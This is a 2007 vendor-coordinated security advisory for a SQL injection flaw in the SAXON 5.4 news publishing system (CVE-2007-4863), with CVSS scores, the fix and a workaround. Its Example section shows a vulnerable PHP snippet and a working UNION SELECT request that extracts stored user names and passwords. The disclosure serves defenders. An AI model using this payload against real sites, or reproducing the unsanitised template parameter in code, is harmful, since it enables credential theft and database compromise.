SAXON version 5.4 SQL Injection Vulnerability Oct 29 2007 03:57PM
securityresearch netvigilance com
netVigilance Security Advisory #55

SAXON version 5.4 SQL Injection Vulnerability

Description:

SAXON is a simple accessible online news publishing system for personal and small corporate site owners. Publish news, using configurable templates, on any .php page on your site. Publish news on a 'per author' basis. Edit and/or delete existing news items. Create multiple RSS news feeds automatically (RSS 0.9, RSS 2.0 and Atom). Post date news items for later public release. Multiple authors allowed. Ability to configure users as Standard or Administrators. Ability to add/delete users (Administrators only). Option to change any user password (Administrators only). Template creation/deletion/amendment interface. Online setup and configuration.

Successful exploitation requires PHP magic_quotes_gpc set to Off.

External References:

Mitre CVE: CVE-2007-4863

NVD NIST: CVE-2007-4863

OSVDB: Unassigned

BUGTRAQ/BID: Unassigned

Summary:

SAXON is a simple accessible online news publishing system for personal and small corporate site owners.

A security problem in the product allows attackers to commit SQL injection.

Advisory URL:

http://www.netvigilance.com/advisory0055

Release Date:

10/29/2007

CVSS Version 2 Metrics:

Base Metrics:

Exploitability Metrics:

Access Vector:

Network

Access Complexity:

Medium

Authentication:

None

Impact Metrics:

Confidentiality Impact:

Complete

Integrity Impact:

Partial

Availability Impact:

Partial

Temporal Metrics:

Exploitability:

Functional

Remediation Level:

Official Fix

Report Confidence:

Confirmed

CVSS Version 2 Vectors:

Base Vector:

"AV:N/AC:M/Au:N/C:C/I:P/A:P"

Temporal Vector:

"E:F/RL:OF/RC:C"

CVSS Version 2 Scores:

Base Score:

8.3

Exploitability Subscore:

8.5

Impact Subscore:

8.6

Temporal Score:

6.9

SecureScout Testcase ID:

TC 17992

Vulnerable Systems:

SAXON version 5.4

Vulnerability Type:

SQL injection allows malicious people to execute their own SQL scripts. This could be exploited to obtain sensitive data, modify database contents or acquire administrator's privileges.

Vendor:

Quirm

Vendor Status:

The Vendor has confirmed the problem and has release new version 5.41 that addresses the problem. New version of product was tested and we can confirm that all vulnerabilities were solved. For more information see vendor announcement. To download the latest version go to vendors product download area.

Workaround:

From netVigilance:

In the php.ini file set magic_quotes_gpc = On.

From vendor:

In future merge to PHP6, because magic_quotes will be removed from PHP 6 completely. See http://www.php.net/~derick/meeting-notes.html#magic-quotes.

Example:

By reading readme.txt create example.php:

<?php include_once "./admin/functions.php";

$config = Config();

#Here we have the dynamic news template change

$tid = $_GET['template'];

include "./news.php";

?>

REQUEST:

http://[TARGET]/[PRODUCT DIRECTORY]/example.php?template=' UNION SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(USER_NAME, USER_PWD), NULL FROM SX_saxon_users %23

REPLY:

Will return registered users names and passwords.

Credits:

Jesper Jurcenoks

Co-founder netVigilance, Inc

www.netvigilance.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus